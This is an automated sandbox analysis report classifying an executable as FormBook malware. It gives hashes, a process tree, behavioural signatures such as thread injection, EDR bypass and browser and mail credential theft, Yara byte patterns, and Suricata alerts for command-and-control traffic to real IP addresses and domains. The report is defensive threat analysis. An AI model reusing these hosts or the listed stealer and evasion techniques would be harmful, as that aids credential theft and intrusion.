Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
-pdf.bat.exe

Overview

General Information

Sample name:-pdf.bat.exe
Analysis ID:1525408
MD5:2a19eac38990809a62213e2b89be0f60
SHA1:99d231bc3c54c0d29469c97c4987329fd523fe20
SHA256:d322df678d8d8b40b30c463a51395a961b0a703a01523d6def82a4679b5729a6
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • -pdf.bat.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\-pdf.bat.exe" MD5: 2A19EAC38990809A62213E2B89BE0F60)
    • -pdf.bat.exe (PID: 2236 cmdline: "C:\Users\user\Desktop\-pdf.bat.exe" MD5: 2A19EAC38990809A62213E2B89BE0F60)
      • ijDRAEBvXKu.exe (PID: 4180 cmdline: "C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ipconfig.exe (PID: 7956 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 7 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T08:07:04.025801+020020507451Malware Command and Control Activity Detected192.168.11.204973113.248.169.4880TCP
        2024-10-04T08:07:27.377023+020020507451Malware Command and Control Activity Detected192.168.11.20497353.33.130.19080TCP
        2024-10-04T08:07:40.630217+020020507451Malware Command and Control Activity Detected192.168.11.20497393.33.130.19080TCP
        2024-10-04T08:07:53.960838+020020507451Malware Command and Control Activity Detected192.168.11.204974384.32.84.3280TCP
        2024-10-04T08:08:07.604179+020020507451Malware Command and Control Activity Detected192.168.11.204974754.67.87.11080TCP
        2024-10-04T08:08:21.799799+020020507451Malware Command and Control Activity Detected192.168.11.2049751194.58.112.17480TCP
        2024-10-04T08:08:36.134022+020020507451Malware Command and Control Activity Detected192.168.11.204975538.47.207.14680TCP
        2024-10-04T08:08:49.455131+020020507451Malware Command and Control Activity Detected192.168.11.20497593.33.130.19080TCP
        2024-10-04T08:09:03.074744+020020507451Malware Command and Control Activity Detected192.168.11.2049763162.213.249.21680TCP
        2024-10-04T08:09:16.303964+020020507451Malware Command and Control Activity Detected192.168.11.20497673.33.130.19080TCP
        2024-10-04T08:09:36.586781+020020507451Malware Command and Control Activity Detected192.168.11.20497713.33.130.19080TCP
        2024-10-04T08:09:51.194765+020020507451Malware Command and Control Activity Detected192.168.11.2049775103.21.221.480TCP
        2024-10-04T08:10:06.308860+020020507451Malware Command and Control Activity Detected192.168.11.2049779133.130.35.9080TCP
        2024-10-04T08:10:19.817346+020020507451Malware Command and Control Activity Detected192.168.11.2049783137.175.33.5680TCP
        2024-10-04T08:10:34.124920+020020507451Malware Command and Control Activity Detected192.168.11.20497873.33.130.19080TCP
        2024-10-04T08:11:16.421246+020020507451Malware Command and Control Activity Detected192.168.11.204979113.248.169.4880TCP
        2024-10-04T08:11:29.558581+020020507451Malware Command and Control Activity Detected192.168.11.20497953.33.130.19080TCP
        2024-10-04T08:11:42.691844+020020507451Malware Command and Control Activity Detected192.168.11.20497993.33.130.19080TCP
        2024-10-04T08:11:55.831625+020020507451Malware Command and Control Activity Detected192.168.11.204980384.32.84.3280TCP
        2024-10-04T08:12:09.217163+020020507451Malware Command and Control Activity Detected192.168.11.204980754.67.87.11080TCP
        2024-10-04T08:12:22.981412+020020507451Malware Command and Control Activity Detected192.168.11.2049811194.58.112.17480TCP
        2024-10-04T08:12:37.094000+020020507451Malware Command and Control Activity Detected192.168.11.204981538.47.207.14680TCP
        2024-10-04T08:12:50.239495+020020507451Malware Command and Control Activity Detected192.168.11.20498193.33.130.19080TCP
        2024-10-04T08:13:03.685558+020020507451Malware Command and Control Activity Detected192.168.11.2049823162.213.249.21680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T08:06:04.714237+020028032702Potentially Bad Traffic192.168.11.2049727185.86.211.13680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T08:07:04.025801+020028554651A Network Trojan was detected192.168.11.204973113.248.169.4880TCP
        2024-10-04T08:07:27.377023+020028554651A Network Trojan was detected192.168.11.20497353.33.130.19080TCP
        2024-10-04T08:07:40.630217+020028554651A Network Trojan was detected192.168.11.20497393.33.130.19080TCP
        2024-10-04T08:07:53.960838+020028554651A Network Trojan was detected192.168.11.204974384.32.84.3280TCP
        2024-10-04T08:08:07.604179+020028554651A Network Trojan was detected192.168.11.204974754.67.87.11080TCP
        2024-10-04T08:08:21.799799+020028554651A Network Trojan was detected192.168.11.2049751194.58.112.17480TCP
        2024-10-04T08:08:36.134022+020028554651A Network Trojan was detected192.168.11.204975538.47.207.14680TCP
        2024-10-04T08:08:49.455131+020028554651A Network Trojan was detected192.168.11.20497593.33.130.19080TCP
        2024-10-04T08:09:03.074744+020028554651A Network Trojan was detected192.168.11.2049763162.213.249.21680TCP
        2024-10-04T08:09:16.303964+020028554651A Network Trojan was detected192.168.11.20497673.33.130.19080TCP
        2024-10-04T08:09:36.586781+020028554651A Network Trojan was detected192.168.11.20497713.33.130.19080TCP
        2024-10-04T08:09:51.194765+020028554651A Network Trojan was detected192.168.11.2049775103.21.221.480TCP
        2024-10-04T08:10:06.308860+020028554651A Network Trojan was detected192.168.11.2049779133.130.35.9080TCP
        2024-10-04T08:10:19.817346+020028554651A Network Trojan was detected192.168.11.2049783137.175.33.5680TCP
        2024-10-04T08:10:34.124920+020028554651A Network Trojan was detected192.168.11.20497873.33.130.19080TCP
        2024-10-04T08:11:16.421246+020028554651A Network Trojan was detected192.168.11.204979113.248.169.4880TCP
        2024-10-04T08:11:29.558581+020028554651A Network Trojan was detected192.168.11.20497953.33.130.19080TCP
        2024-10-04T08:11:42.691844+020028554651A Network Trojan was detected192.168.11.20497993.33.130.19080TCP
        2024-10-04T08:11:55.831625+020028554651A Network Trojan was detected192.168.11.204980384.32.84.3280TCP
        2024-10-04T08:12:09.217163+020028554651A Network Trojan was detected192.168.11.204980754.67.87.11080TCP
        2024-10-04T08:12:22.981412+020028554651A Network Trojan was detected192.168.11.2049811194.58.112.17480TCP
        2024-10-04T08:12:37.094000+020028554651A Network Trojan was detected192.168.11.204981538.47.207.14680TCP
        2024-10-04T08:12:50.239495+020028554651A Network Trojan was detected192.168.11.20498193.33.130.19080TCP
        2024-10-04T08:13:03.685558+020028554651A Network Trojan was detected192.168.11.2049823162.213.249.21680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204974084.32.84.3280TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204980084.32.84.3280TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204980284.32.84.3280TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204980184.32.84.3280TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204974284.32.84.3280TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204979013.248.169.4880TCP
        2024-10-04T08:05:31.316838+020028554641A Network Trojan was detected192.168.11.204974184.32.84.3280TCP
        2024-10-04T08:07:20.383566+020028554641A Network Trojan was detected192.168.11.20497323.33.130.19080TCP
        2024-10-04T08:07:22.100362+020028554641A Network Trojan was detected192.168.11.20497333.33.130.19080TCP
        2024-10-04T08:07:24.735595+020028554641A Network Trojan was detected192.168.11.20497343.33.130.19080TCP
        2024-10-04T08:07:32.714938+020028554641A Network Trojan was detected192.168.11.20497363.33.130.19080TCP
        2024-10-04T08:07:36.756611+020028554641A Network Trojan was detected192.168.11.20497373.33.130.19080TCP
        2024-10-04T08:07:38.893739+020028554641A Network Trojan was detected192.168.11.20497383.33.130.19080TCP
        2024-10-04T08:07:59.544844+020028554641A Network Trojan was detected192.168.11.204974454.67.87.11080TCP
        2024-10-04T08:08:02.225108+020028554641A Network Trojan was detected192.168.11.204974554.67.87.11080TCP
        2024-10-04T08:08:04.912589+020028554641A Network Trojan was detected192.168.11.204974654.67.87.11080TCP
        2024-10-04T08:08:13.451544+020028554641A Network Trojan was detected192.168.11.2049748194.58.112.17480TCP
        2024-10-04T08:08:16.370453+020028554641A Network Trojan was detected192.168.11.2049749194.58.112.17480TCP
        2024-10-04T08:08:19.055237+020028554641A Network Trojan was detected192.168.11.2049750194.58.112.17480TCP
        2024-10-04T08:08:27.522500+020028554641A Network Trojan was detected192.168.11.204975238.47.207.14680TCP
        2024-10-04T08:08:30.383804+020028554641A Network Trojan was detected192.168.11.204975338.47.207.14680TCP
        2024-10-04T08:08:33.206347+020028554641A Network Trojan was detected192.168.11.204975438.47.207.14680TCP
        2024-10-04T08:08:42.464192+020028554641A Network Trojan was detected192.168.11.20497563.33.130.19080TCP
        2024-10-04T08:08:44.171973+020028554641A Network Trojan was detected192.168.11.20497573.33.130.19080TCP
        2024-10-04T08:08:48.225224+020028554641A Network Trojan was detected192.168.11.20497583.33.130.19080TCP
        2024-10-04T08:08:54.961293+020028554641A Network Trojan was detected192.168.11.2049760162.213.249.21680TCP
        2024-10-04T08:08:57.660518+020028554641A Network Trojan was detected192.168.11.2049761162.213.249.21680TCP
        2024-10-04T08:09:00.343253+020028554641A Network Trojan was detected192.168.11.2049762162.213.249.21680TCP
        2024-10-04T08:09:08.397666+020028554641A Network Trojan was detected192.168.11.20497643.33.130.19080TCP
        2024-10-04T08:09:11.025336+020028554641A Network Trojan was detected192.168.11.20497653.33.130.19080TCP
        2024-10-04T08:09:13.666700+020028554641A Network Trojan was detected192.168.11.20497663.33.130.19080TCP
        2024-10-04T08:09:21.628952+020028554641A Network Trojan was detected192.168.11.20497683.33.130.19080TCP
        2024-10-04T08:09:24.255747+020028554641A Network Trojan was detected192.168.11.20497693.33.130.19080TCP
        2024-10-04T08:09:26.897559+020028554641A Network Trojan was detected192.168.11.20497703.33.130.19080TCP
        2024-10-04T08:09:42.768300+020028554641A Network Trojan was detected192.168.11.2049772103.21.221.480TCP
        2024-10-04T08:09:45.584421+020028554641A Network Trojan was detected192.168.11.2049773103.21.221.480TCP
        2024-10-04T08:09:48.428360+020028554641A Network Trojan was detected192.168.11.2049774103.21.221.480TCP
        2024-10-04T08:09:57.888410+020028554641A Network Trojan was detected192.168.11.2049776133.130.35.9080TCP
        2024-10-04T08:10:00.688885+020028554641A Network Trojan was detected192.168.11.2049777133.130.35.9080TCP
        2024-10-04T08:10:03.567159+020028554641A Network Trojan was detected192.168.11.2049778133.130.35.9080TCP
        2024-10-04T08:10:11.751332+020028554641A Network Trojan was detected192.168.11.2049780137.175.33.5680TCP
        2024-10-04T08:10:14.445249+020028554641A Network Trojan was detected192.168.11.2049781137.175.33.5680TCP
        2024-10-04T08:10:17.133476+020028554641A Network Trojan was detected192.168.11.2049782137.175.33.5680TCP
        2024-10-04T08:10:26.703408+020028554641A Network Trojan was detected192.168.11.20497843.33.130.19080TCP
        2024-10-04T08:10:27.929484+020028554641A Network Trojan was detected192.168.11.20497853.33.130.19080TCP
        2024-10-04T08:10:30.576243+020028554641A Network Trojan was detected192.168.11.20497863.33.130.19080TCP
        2024-10-04T08:11:08.503853+020028554641A Network Trojan was detected192.168.11.204978813.248.169.4880TCP
        2024-10-04T08:11:11.139810+020028554641A Network Trojan was detected192.168.11.204978913.248.169.4880TCP
        2024-10-04T08:11:21.637551+020028554641A Network Trojan was detected192.168.11.20497923.33.130.19080TCP
        2024-10-04T08:11:24.291250+020028554641A Network Trojan was detected192.168.11.20497933.33.130.19080TCP
        2024-10-04T08:11:26.917056+020028554641A Network Trojan was detected192.168.11.20497943.33.130.19080TCP
        2024-10-04T08:11:35.698479+020028554641A Network Trojan was detected192.168.11.20497963.33.130.19080TCP
        2024-10-04T08:11:37.424219+020028554641A Network Trojan was detected192.168.11.20497973.33.130.19080TCP
        2024-10-04T08:11:40.971707+020028554641A Network Trojan was detected192.168.11.20497983.33.130.19080TCP
        2024-10-04T08:12:01.158312+020028554641A Network Trojan was detected192.168.11.204980454.67.87.11080TCP
        2024-10-04T08:12:03.843560+020028554641A Network Trojan was detected192.168.11.204980554.67.87.11080TCP
        2024-10-04T08:12:06.530851+020028554641A Network Trojan was detected192.168.11.204980654.67.87.11080TCP
        2024-10-04T08:12:14.710122+020028554641A Network Trojan was detected192.168.11.2049808194.58.112.17480TCP
        2024-10-04T08:12:17.456583+020028554641A Network Trojan was detected192.168.11.2049809194.58.112.17480TCP
        2024-10-04T08:12:20.227339+020028554641A Network Trojan was detected192.168.11.2049810194.58.112.17480TCP
        2024-10-04T08:12:28.589435+020028554641A Network Trojan was detected192.168.11.204981238.47.207.14680TCP
        2024-10-04T08:12:31.424116+020028554641A Network Trojan was detected192.168.11.204981338.47.207.14680TCP
        2024-10-04T08:12:34.257482+020028554641A Network Trojan was detected192.168.11.204981438.47.207.14680TCP
        2024-10-04T08:12:42.323419+020028554641A Network Trojan was detected192.168.11.20498163.33.130.19080TCP
        2024-10-04T08:12:44.963088+020028554641A Network Trojan was detected192.168.11.20498173.33.130.19080TCP
        2024-10-04T08:12:47.605353+020028554641A Network Trojan was detected192.168.11.20498183.33.130.19080TCP
        2024-10-04T08:12:55.602099+020028554641A Network Trojan was detected192.168.11.2049820162.213.249.21680TCP
        2024-10-04T08:12:58.275186+020028554641A Network Trojan was detected192.168.11.2049821162.213.249.21680TCP
        2024-10-04T08:13:00.993932+020028554641A Network Trojan was detected192.168.11.2049822162.213.249.21680TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for domain / URL
        Source: platinumkitchens.infoVirustotal: Detection: 9%Perma Link
        Source: tempatmudisini01.clickVirustotal: Detection: 12%Perma Link
        Source: www.tempatmudisini01.clickVirustotal: Detection: 8%Perma Link
        Multi AV Scanner detection for submitted file
        Source: -pdf.bat.exeReversingLabs: Detection: 23%
        Source: -pdf.bat.exeVirustotal: Detection: 26%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: -pdf.bat.exeJoe Sandbox ML: detected
        Source: -pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 185.86.211.136:443 -> 192.168.11.20:49728 version: TLS 1.2
        Source: -pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ijDRAEBvXKu.exe, 00000003.00000002.42752421981.000000000050E000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: -pdf.bat.exe, -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_0040682E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040682E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_004066E4 FindFirstFileW,FindClose,0_2_004066E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 4x nop then xor eax, eax3_2_0103490B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 4x nop then pop edi3_2_0103FF1E

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49735 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49735 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49739 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49739 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49734 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49731 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49731 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49737 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49732 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49751 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49751 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49743 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49743 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49747 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49747 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49738 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 3.33.130.190:80
